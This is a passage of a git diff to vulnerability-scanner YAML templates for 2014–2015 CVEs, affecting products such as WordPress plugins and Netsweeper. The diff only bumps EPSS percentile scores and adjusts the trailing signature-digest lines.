4a0a0047304502210083f967aed9aa31ee6568da51c0c74ed3f6a315dc7d27f2374a2a93407bd7c1690220010bb7a86ef81734ec4e5880540c115a35c1f816b73796fe506200b4746b9849:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index e197a9f591..752cef937e 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45552 + epss-percentile: 0.45577 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa4a650e0fba19671eb670ab3d34ab03b11e147e48f04baaf600da266badc869022055ddde6d809a71ea76ba548a7035da9277f479d8e1182dfc853cf1d06a9cd37e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100aa4a650e0fba19671eb670ab3d34ab03b11e147e48f04baaf600da266badc869022055ddde6d809a71ea76ba548a7035da9277f479d8e1182dfc853cf1d06a9cd37e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index a81cfc15e1..feef3c4be4 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e6914f4398781e1d9efae4febe919d18a92d29dcb591fbf15995f9024cd0ae6022003c3adaa62919fdc13f762e50cf2524509383667a87dde547480021ceb3d83f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207e6914f4398781e1d9efae4febe919d18a92d29dcb591fbf15995f9024cd0ae6022003c3adaa62919fdc13f762e50cf2524509383667a87dde547480021ceb3d83f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index fa908eccfb..97bf790066 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022039f1126199a94844f9ea9107ed10d475d8bf958c70a110013d7b1698afb5ca7802203e1c387cbc9f0f35fda76916cf7e6ce03d46aa74f7195f2c83017a503698ab34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022039f1126199a94844f9ea9107ed10d475d8bf958c70a110013d7b1698afb5ca7802203e1c387cbc9f0f35fda76916cf7e6ce03d46aa74f7195f2c83017a503698ab34:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index d101c0da47..15f000c8d4 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40522 + epss-percentile: 0.4055 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051036619adc3bb96ead4ed0f01dba64c5a326c0dde8e98add1e3214e97cc73ea022100ca255fd5e3780cc74ded04661e2da0df25c66566f93148dfea656eb0edb896d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022051036619adc3bb96ead4ed0f01dba64c5a326c0dde8e98add1e3214e97cc73ea022100ca255fd5e3780cc74ded04661e2da0df25c66566f93148dfea656eb0edb896d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 2058c99857..37ca383611 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48521 + epss-percentile: 0.48547 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -57,4 +57,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c5228dc58d75695861f226128275162b935898e0ecfc3292f74e20dabc96efe022043df1701195daaad4b5491d3ab1bbd1375bccaed885af0884eac9d2b60b85fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008c5228dc58d75695861f226128275162b935898e0ecfc3292f74e20dabc96efe022043df1701195daaad4b5491d3ab1bbd1375bccaed885af0884eac9d2b60b85fa6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index bb3d17368a..95beeebc9f 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.03891 - epss-percentile: 0.90945 + epss-percentile: 0.90952 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100918808f7241c19e3dd85144a50b5a6c2b145662f046e12fd3d9b5dd8d8f9c3cb022100f582d13bfc25d13f66dd86133b02e7ad33cd7f96fe97c43d83d9669cdac77740:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100918808f7241c19e3dd85144a50b5a6c2b145662f046e12fd3d9b5dd8d8f9c3cb022100f582d13bfc25d13f66dd86133b02e7ad33cd7f96fe97c43d83d9669cdac77740:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 9ff259c25d..3dd4e68e59 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - epss-percentile: 0.82173 + epss-percentile: 0.82191 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -53,4 +53,5 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a0047304502200f5cea65272b2a45681bb0e23a406429426404ee4f78525184e907aae8a09b0b022100e5142e9b3486751ecc3801830f131d174f652b8e128846967691c8185df7389b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200f5cea65272b2a45681bb0e23a406429426404ee4f78525184e907aae8a09b0b022100e5142e9b3486751ecc3801830f131d174f652b8e128846967691c8185df7389b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 5bb68908be..06e599e80f 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.0445 - epss-percentile: 0.91468 + epss-percentile: 0.91474 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022002fa59168d926396bbf52d601be8b2f2b2e407f14277089e4fb797ae4d79fcfd02203c2eea4d18dbb45540679a0ded5b7be2e1df00824d83b4ba371b1a29dea9ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022002fa59168d926396bbf52d601be8b2f2b2e407f14277089e4fb797ae4d79fcfd02203c2eea4d18dbb45540679a0ded5b7be2e1df00824d83b4ba371b1a29dea9ab92:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index b0fd251159..3d6f966c9d 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.01386 - epss-percentile: 0.84911 + epss-percentile: 0.84921 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3b89a2ffe233d6bc2b2e5c93d6485d4bb5351ff37b38ba309a734a52e33d67402204e12a199c91f3419c347a6e53e5e606f95e16b4cea4b6fb22ce9cdf13d0aaba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c3b89a2ffe233d6bc2b2e5c93d6485d4bb5351ff37b38ba309a734a52e33d67402204e12a199c91f3419c347a6e53e5e606f95e16b4cea4b6fb22ce9cdf13d0aaba1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 01d2010721..b26aa64a6f 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94006 + epss-percentile: 0.94015 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206837b94d453746df06b3dab83550185e19da50a1d1171631dbd324593cadf545022100ee47bfd786b38c85e73bcb2c2c81651ed7730be83c1c70e9716016d34bbc4ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206837b94d453746df06b3dab83550185e19da50a1d1171631dbd324593cadf545022100ee47bfd786b38c85e73bcb2c2c81651ed7730be83c1c70e9716016d34bbc4ac6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index d13dc3efb4..5a10a9e9f2 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -20,7 +20,7 @@ info: cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 - epss-percentile: 0.99817 + epss-percentile: 0.99818 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index f83d38497f..14d141d602 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94017 + epss-percentile: 0.94025 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af2820c56c355c789211c1dfc0424ddea0d331d31d692125863f5a863fbf2b4202204a84111635f121d69efbbcfda46f3b7d1dabcedd1092814b419c0af0db4a2991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100af2820c56c355c789211c1dfc0424ddea0d331d31d692125863f5a863fbf2b4202204a84111635f121d69efbbcfda46f3b7d1dabcedd1092814b419c0af0db4a2991:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index a911af7d6d..36bed9e750 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.5723 + epss-percentile: 0.57248 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa038567ef589e20dc118d7af230af72128ab36b0da47028dac6abab41b64fc0022100f516187800fd8f829848add95440628a9d53e22a6d0d0e23baba3197c36211ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100aa038567ef589e20dc118d7af230af72128ab36b0da47028dac6abab41b64fc0022100f516187800fd8f829848add95440628a9d53e22a6d0d0e23baba3197c36211ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 72791c65d7..56c781b88b 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - epss-percentile: 0.7986 + epss-percentile: 0.79869 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a30a521bb50fae27f5a078f9c572359b2021e2c988ef5e0a17c809c57bb0a54022100c9381d49319ff05cbfeb9fe8a91bd90eacbc23c161244880fe70e1e55524bbf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200a30a521bb50fae27f5a078f9c572359b2021e2c988ef5e0a17c809c57bb0a54022100c9381d49319ff05cbfeb9fe8a91bd90eacbc23c161244880fe70e1e55524bbf4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 5652c91409..b6baf26f72 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.9558 + epss-percentile: 0.95583 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202001c7c2c6df1ce3b534cd80053daa93da7e4656a03d734ad40eb6ba9b8f77310221009fcc81fbe6ea0502b3bd3099601dfb185f8f2b2d29360e88b1742a475f67b06a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202001c7c2c6df1ce3b534cd80053daa93da7e4656a03d734ad40eb6ba9b8f77310221009fcc81fbe6ea0502b3bd3099601dfb185f8f2b2d29360e88b1742a475f67b06a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 70ade8a618..216084f91e 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.83554 - epss-percentile: 0.98098 + epss-percentile: 0.981 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c40c2ac383f379a0bb4b9e26917e5ef78dcfc7f796d7b71eacfd43af8a78dd5022071cef7e2d6c874db97e80569d8745c02ccf2a33e66da35bcfbdfff09ccf24fd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204c40c2ac383f379a0bb4b9e26917e5ef78dcfc7f796d7b71eacfd43af8a78dd5022071cef7e2d6c874db97e80569d8745c02ccf2a33e66da35bcfbdfff09ccf24fd9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index fdd4d49367..8b07d550e2 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9119 cwe-id: CWE-22 epss-score: 0.1414 - epss-percentile: 0.95084 + epss-percentile: 0.9509 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022037e1c6bca52c15158c524d744523cc134963add8d26484399251c0fea74bb79602210093df65e41e4007724605f9a6b4da96960dea4aa973585e9da970b3ba065a3e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022037e1c6bca52c15158c524d744523cc134963add8d26484399251c0fea74bb79602210093df65e41e4007724605f9a6b4da96960dea4aa973585e9da970b3ba065a3e8d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 128b345c80..ade35755a4 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9180 cwe-id: CWE-601 epss-score: 0.00248 - epss-percentile: 0.62551 + epss-percentile: 0.6257 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402203b242ad202c2d5415d46bdfebd759a3b4e1fe4048ea76db011118cc3157347d102204433a0356b6ca2315cf05a942c1658dd6d271e1d4df0ceebeeabf1a089fb161d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203b242ad202c2d5415d46bdfebd759a3b4e1fe4048ea76db011118cc3157347d102204433a0356b6ca2315cf05a942c1658dd6d271e1d4df0ceebeeabf1a089fb161d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 6b89e977cf..c42ff9fefb 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - epss-percentile: 0.65395 + epss-percentile: 0.65415 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f06736f1db5cb181ab0da9c82bfc71c868f505c9d75b1a2861fb09eac1d9b97022035f80abfc3eb7710e70e853874b528cdefa8643b410c021c282a50b56211f46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203f06736f1db5cb181ab0da9c82bfc71c868f505c9d75b1a2861fb09eac1d9b97022035f80abfc3eb7710e70e853874b528cdefa8643b410c021c282a50b56211f46b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index fe6b7749c2..a92a2f6046 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41422 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7809e1dcef3d86c8976f6f19325aa2bb209b3e095af3e10d91f381bd7fa119a022034dd6baac9719919d105aa8ebcf04ea9490c4155517fefd6d87fd19f23ab4c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d7809e1dcef3d86c8976f6f19325aa2bb209b3e095af3e10d91f381bd7fa119a022034dd6baac9719919d105aa8ebcf04ea9490c4155517fefd6d87fd19f23ab4c94:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index cdaf8218de..dbfe758cf1 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41422 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009572ee585dbdd4172d2cb2e83fe853b4df6cb48b72c593ca5b055899b57e623302210082e898bdce2e499f25b819a792cd03f9f89c2cad2ef4462a5da685d0e33cf7b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009572ee585dbdd4172d2cb2e83fe853b4df6cb48b72c593ca5b055899b57e623302210082e898bdce2e499f25b819a792cd03f9f89c2cad2ef4462a5da685d0e33cf7b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index ff35b01ea5..3e96288bbc 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41422 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022038d0d37869fb5b6827f0c07a6ba6920cd9608d0b6200d5d9a4ce467b3b289f35022056802c4aa9e865c6bd5bdc666b2d91b0d91beb6458ebe88d280c6bd2ed6a7e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022038d0d37869fb5b6827f0c07a6ba6920cd9608d0b6200d5d9a4ce467b3b289f35022056802c4aa9e865c6bd5bdc666b2d91b0d91beb6458ebe88d280c6bd2ed6a7e76:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 5fffe0c998..39e208fbca 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00212 - epss-percentile: 0.58939 + epss-percentile: 0.58957 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063f63d3e359f5307717def43f716280c749d60d95ccfbd334dd43925793ea6e30221008ff5ed88bc6430785820dce12d2f6b0d462eeeac55619dfa76dd1c8373bc402a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022063f63d3e359f5307717def43f716280c749d60d95ccfbd334dd43925793ea6e30221008ff5ed88bc6430785820dce12d2f6b0d462eeeac55619dfa76dd1c8373bc402a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index fa2ffcaf4c..f968f2ac7e 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85136 + epss-percentile: 0.85145 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -52,4 +52,5 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100fbd88b2c575ddda9441093d01b8776a3fbdf94fb13bbcdb86074ee2b36062b380220559a9c6af3538744801e1f96829c8b76f8acbdb56799071a73bf28b2ebaad369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fbd88b2c575ddda9441093d01b8776a3fbdf94fb13bbcdb86074ee2b36062b380220559a9c6af3538744801e1f96829c8b76f8acbdb56799071a73bf28b2ebaad369:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 409d8e1945..19a6dd674b 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41422 + epss-percentile: 0.4145 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220224f9c50cb6b680195b5fad86cf2aec8ad6a2f13dd979b0307b4e190c6136227022100e5ef6371522ce27f2dd8d1c6fe28ca037e11674d7f84cc14317fb3de8ef7c84f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220224f9c50cb6b680195b5fad86cf2aec8ad6a2f13dd979b0307b4e190c6136227022100e5ef6371522ce27f2dd8d1c6fe28ca037e11674d7f84cc14317fb3de8ef7c84f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 8c9b2796ee..6c06b8144d 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43807 + epss-percentile: 0.43832 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a0048304602210094ec1089c0a94013a80fa24871bd31d5af12a905aed55af80ec6808e315c3e45022100ab5dd57ed571bc88dfce7f88352639a77d624a2d2e5ff4a7e7cc701397d37a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210094ec1089c0a94013a80fa24871bd31d5af12a905aed55af80ec6808e315c3e45022100ab5dd57ed571bc88dfce7f88352639a77d624a2d2e5ff4a7e7cc701397d37a67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index ac38791416..3b1cd35936 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90408 + epss-percentile: 0.90412 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204decea496284f2ff5de8ea833816d2397989c4fdd11efa56da15a4478229c1180220324abc5938c8d88d9f32b03b1ac65ab84331be81320f5d0f4dbd017c85bd28fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204decea496284f2ff5de8ea833816d2397989c4fdd11efa56da15a4478229c1180220324abc5938c8d88d9f32b03b1ac65ab84331be81320f5d0f4dbd017c85bd28fb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 3a879995e4..203c89cdc8 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.0196 - epss-percentile: 0.87438 + epss-percentile: 0.87454 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022071f71331e80036a1e8477f0f6a7de6d9f12e10422ab324b9bb2debe17bcccccb0220373044b153107c4578f8e500bc17ba7901f7677db70116949d0b7b7cb25853f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 